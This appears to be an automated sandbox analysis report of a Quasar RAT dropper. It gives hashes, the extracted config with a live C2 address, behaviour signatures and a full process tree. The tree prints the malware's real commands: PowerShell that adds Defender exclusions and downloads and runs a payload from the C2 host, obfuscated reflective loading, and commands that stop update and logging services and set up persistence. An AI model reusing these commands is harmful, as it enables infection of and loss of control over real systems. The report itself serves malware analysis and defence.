Analysis

  • max time kernel
    25s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-01-2025 21:02

General

  • Target

    c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe

  • Size

    3.2MB

  • MD5

    77d75d34a217ca48d26b72d6bf8dedb0

  • SHA1

    9a623c8553fec5ccceb7b0de3d1b828da3a49ac2

  • SHA256

    c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578

  • SHA512

    0334623cf7192350bfb8f15a02b273d9cc8e9504f8a04aab0db29e4bfa25e1cc36f35fa2017da73a331caad6aaa893b4b99c9e891071f3b43959f4ad000f53bc

  • SSDEEP

    98304:j3Gv5mmQ4yVPgp5qG8AbuF+taoPKN494tP+DLA1s2x:j3Gv5mmQ4yVPgp5qG8AbuF+ta+KN4yt9

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

C2

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes
  • encryption_key

    B000736BEBDF08FC1B6696200651882CF57E43E7

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    3dfx Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Power Settings 1 TTPs 13 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 16 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 23 IoCs
  • Modifies registry class 24 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:380
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{afbe217d-a802-4fe9-8f77-5417898b8cd8}
          2⤵
            PID:5620
          • C:\Windows\SysWOW64\dllhost.exe
            C:\Windows\SysWOW64\dllhost.exe /Processid:{5b361c4d-9521-4006-9376-e68bfcca09cb}
            2⤵
              PID:2468
            • C:\Windows\SysWOW64\dllhost.exe
              C:\Windows\SysWOW64\dllhost.exe /Processid:{5b361c4d-9521-4006-9376-e68bfcca09cb}
              2⤵
                PID:6116
              • C:\Windows\SysWOW64\dllhost.exe
                C:\Windows\SysWOW64\dllhost.exe /Processid:{5b361c4d-9521-4006-9376-e68bfcca09cb}
                2⤵
                  PID:6056
              • C:\Windows\system32\lsass.exe
                C:\Windows\system32\lsass.exe
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:680
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                1⤵
                  PID:960
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:756
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                    1⤵
                      PID:872
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      1⤵
                        PID:1096
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                        1⤵
                          PID:1128
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                            PID:1160
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                              PID:1208
                              • C:\Windows\system32\taskhostw.exe
                                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                2⤵
                                  PID:2860
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                  2⤵
                                    PID:4856
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                    2⤵
                                      PID:3068
                                    • C:\Program Files\Cuis\bon\Bara.exe
                                      "C:\Program Files\Cuis\bon\Bara.exe"
                                      2⤵
                                        PID:5136
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          PID:1716
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                      1⤵
                                        PID:1292
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                        1⤵
                                          PID:1316
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                          1⤵
                                            PID:1324
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1436
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                              1⤵
                                                PID:1444
                                                • C:\Windows\system32\sihost.exe
                                                  sihost.exe
                                                  2⤵
                                                    PID:2644
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                  1⤵
                                                    PID:1564
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                    1⤵
                                                      PID:1580
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                      1⤵
                                                        PID:1660
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                        1⤵
                                                          PID:1700
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                          1⤵
                                                            PID:1732
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                            1⤵
                                                              PID:1772
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                              1⤵
                                                                PID:1820
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                1⤵
                                                                  PID:1932
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                  1⤵
                                                                    PID:1968
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                    1⤵
                                                                      PID:1976
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                      1⤵
                                                                        PID:2044
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                          PID:1940
                                                                        • C:\Windows\System32\spoolsv.exe
                                                                          C:\Windows\System32\spoolsv.exe
                                                                          1⤵
                                                                            PID:2108
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                            1⤵
                                                                              PID:2216
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                              1⤵
                                                                                PID:2364
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                1⤵
                                                                                  PID:2508
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                  1⤵
                                                                                    PID:2516
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                    1⤵
                                                                                      PID:2660
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                      1⤵
                                                                                        PID:2736
                                                                                      • C:\Windows\sysmon.exe
                                                                                        C:\Windows\sysmon.exe
                                                                                        1⤵
                                                                                          PID:2768
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                          1⤵
                                                                                            PID:2796
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                            1⤵
                                                                                              PID:2824
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                              1⤵
                                                                                                PID:2832
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                1⤵
                                                                                                  PID:3004
                                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:2132
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                    1⤵
                                                                                                      PID:3340
                                                                                                    • C:\Windows\Explorer.EXE
                                                                                                      C:\Windows\Explorer.EXE
                                                                                                      1⤵
                                                                                                        PID:3432
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\c28e37ce98cb20850ba164913c668995822e38c35c491d5ca0e5ec206148b578N.exe"
                                                                                                          2⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4240
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\sd895CEfer.bat" "
                                                                                                            3⤵
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4912
                                                                                                            • C:\Windows\system32\net.exe
                                                                                                              net session
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4924
                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                C:\Windows\system32\net1 session
                                                                                                                5⤵
                                                                                                                  PID:1056
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public\Documents;Invoke-WebRequest 185.148.3.216/5fr5gthkjdg71 -OutFile 5fr5gthkjdg71.exe;./5fr5gthkjdg71.exe;exit
                                                                                                                4⤵
                                                                                                                • Blocklisted process makes network request
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4212
                                                                                                                • C:\Users\Public\Documents\5fr5gthkjdg71.exe
                                                                                                                  "C:\Users\Public\Documents\5fr5gthkjdg71.exe"
                                                                                                                  5⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:2240
                                                                                                                  • C:\Users\Public\Documents\gfiKDLgr58thy4d.exe
                                                                                                                    "C:\Users\Public\Documents\gfiKDLgr58thy4d.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:1668
                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                      7⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:4748
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                      7⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3612
                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                        8⤵
                                                                                                                          PID:3172
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:1536
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4484
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3428
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3364
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3540
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                        7⤵
                                                                                                                        • Power Settings
                                                                                                                        PID:4276
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                        7⤵
                                                                                                                        • Power Settings
                                                                                                                        PID:2692
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                        7⤵
                                                                                                                        • Power Settings
                                                                                                                        PID:2436
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                        7⤵
                                                                                                                        • Power Settings
                                                                                                                        PID:1952
                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                        7⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:4012
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe delete "WAGDKRVZ"
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4300
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4748
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4916
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe start "WAGDKRVZ"
                                                                                                                        7⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4176
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          8⤵
                                                                                                                            PID:3736
                                                                                                                      • C:\Users\Public\Documents\GR55Qg1hth.exe
                                                                                                                        "C:\Users\Public\Documents\GR55Qg1hth.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:4588
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                          7⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:968
                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                          cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                          7⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:3500
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            8⤵
                                                                                                                              PID:864
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop UsoSvc
                                                                                                                              8⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:3348
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop WaaSMedicSvc
                                                                                                                              8⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:3544
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop wuauserv
                                                                                                                              8⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:2744
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop bits
                                                                                                                              8⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:3920
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop dosvc
                                                                                                                              8⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:3172
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                                                              8⤵
                                                                                                                                PID:5520
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                                                                8⤵
                                                                                                                                  PID:5664
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                                                  8⤵
                                                                                                                                    PID:5716
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                                                    8⤵
                                                                                                                                      PID:5768
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                                                      8⤵
                                                                                                                                        PID:5828
                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                      7⤵
                                                                                                                                      • Power Settings
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:1984
                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                        powercfg /x -hibernate-timeout-ac 0
                                                                                                                                        8⤵
                                                                                                                                        • Power Settings
                                                                                                                                        PID:4932
                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                        powercfg /x -hibernate-timeout-dc 0
                                                                                                                                        8⤵
                                                                                                                                        • Power Settings
                                                                                                                                        PID:456
                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                        powercfg /x -standby-timeout-ac 0
                                                                                                                                        8⤵
                                                                                                                                        • Power Settings
                                                                                                                                        PID:4484
                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                        powercfg /x -standby-timeout-dc 0
                                                                                                                                        8⤵
                                                                                                                                        • Power Settings
                                                                                                                                        PID:2380
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
                                                                                                                                      7⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:2804
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        8⤵
                                                                                                                                          PID:3396
                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                        7⤵
                                                                                                                                          PID:5972
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
                                                                                                                                          7⤵
                                                                                                                                            PID:5980
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              "C:\Windows\system32\schtasks.exe" /run /tn Barac
                                                                                                                                              8⤵
                                                                                                                                                PID:5264
                                                                                                                                          • C:\Users\Public\Documents\F4R5fd8grr.exe
                                                                                                                                            "C:\Users\Public\Documents\F4R5fd8grr.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:3692
                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                              "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Public\Documents\F4R5fd8grr.exe" /rl HIGHEST /f
                                                                                                                                              7⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:864
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:908
                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                8⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:1760
                                                                                                                                    • C:\Windows\System32\msiexec.exe
                                                                                                                                      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Public\setup.msi"
                                                                                                                                      3⤵
                                                                                                                                      • Enumerates connected drives
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:1520
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:3564
                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                    1⤵
                                                                                                                                      PID:3740
                                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:3896
                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:3492
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4016
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                            1⤵
                                                                                                                                              PID:4844
